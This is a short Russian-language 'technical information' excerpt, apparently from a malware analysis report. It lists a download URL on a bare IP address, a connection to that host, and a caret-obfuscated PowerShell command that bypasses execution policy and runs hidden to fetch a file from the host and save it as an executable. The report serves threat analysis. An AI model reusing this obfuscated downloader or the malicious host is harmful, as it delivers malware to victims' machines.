Техническая информация
- http://46.30.46.70/s.jpe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^wersh^ELl.E^xE^ -execu^tIo^npOL^I^C^Y^ B^yp^aS^S -NoPROf^i^l^E -WiNDowst^Yl^E h^I^Dd^E^n^ ^(^nEW-o^B^jE^ct sY^stE^M.N^ET.wEBCLiENT).DowNloAD^f^I^L^e^('http://46.30.46.70/s.j...
- '46.#0.46.70':80
- '<SYSTEM32>\cmd.exe' /C "p^o^wersh^ELl.E^xE^ -execu^tIo^npOL^I^C^Y^ B^yp^aS^S -NoPROf^i^l^E -WiNDowst^Yl^E h^I^Dd^E^n^ ^(^nEW-o^B^jE^ct sY^stE^M.N^ET.wEBCLiENT).DowNloAD^f^I^L^e^('http://46.30.46.70/s.j...' (со скрытым окном)